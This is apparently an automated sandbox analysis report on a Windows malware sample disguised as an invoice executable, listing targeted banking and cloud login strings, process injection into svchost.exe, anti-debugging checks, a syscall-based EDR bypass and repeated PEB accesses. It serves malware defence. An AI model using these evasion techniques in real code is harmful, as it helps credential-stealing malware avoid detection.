Source: 59F79305l7.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 59F79305l7.5.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 59F79305l7.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 59F79305l7.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 59F79305l7.5.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 59F79305l7.5.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 59F79305l7.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 59F79305l7.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 59F79305l7.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 59F79305l7.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 59F79305l7.5.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 59F79305l7.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 59F79305l7.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 59F79305l7.5.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 59F79305l7.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 59F79305l7.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: MUjPkRkjOWKkX.exe, 00000007.00000002.3292212548.000000000106F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

API call chain: ExitProcess graph end node

graph_0-86695

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0387096E rdtsc

2_2_0387096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417473 LdrLoadDll,

2_2_00417473

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0045A370 BlockInput,

0_2_0045A370

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,

0_2_0040D590

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe

Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,

0_2_0040EBD0

Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_040A7110 mov eax, dword ptr fs:[00000030h]	0_2_040A7110
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_040A7170 mov eax, dword ptr fs:[00000030h]	0_2_040A7170
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe	Code function: 0_2_040A5AE0 mov eax, dword ptr fs:[00000030h]	0_2_040A5AE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]	2_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]	2_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h]	2_2_038EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h]	2_2_038B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]	2_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]	2_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038663FF mov eax, dword ptr fs:[00000030h]	2_2_038663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h]	2_2_0382C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h]	2_2_03850310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov ecx, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h]	2_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h]	2_2_038D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390634F mov eax, dword ptr fs:[00000030h]	2_2_0390634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D437C mov eax, dword ptr fs:[00000030h]	2_2_038D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]	2_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]	2_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]	2_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]	2_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039062D6 mov eax, dword ptr fs:[00000030h]	2_2_039062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]	2_2_0382823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h]	2_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h]	2_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390625D mov eax, dword ptr fs:[00000030h]	2_2_0390625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]	2_2_0382A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]	2_2_03836259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]	2_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]	2_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]	2_2_0382826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]	2_2_03870185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]	2_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]	2_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]	2_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]	2_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]	2_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]	2_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]	2_2_039061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]	2_2_038601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]	2_2_038F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]	2_2_03860124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]	2_2_0382C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h]	2_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]	2_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]	2_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]	2_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]	2_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]	2_2_0383208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038280A0 mov eax, dword ptr fs:[00000030h]	2_2_038280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h]	2_2_038C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]	2_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]	2_2_038B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0382A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]	2_2_038380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h]	2_2_038B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0382C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]	2_2_038720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h]	2_2_038B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]	2_2_0382A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]	2_2_0382C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h]	2_2_038C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]	2_2_03832050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h]	2_2_038B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]	2_2_0385C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D678E mov eax, dword ptr fs:[00000030h]	2_2_038D678E
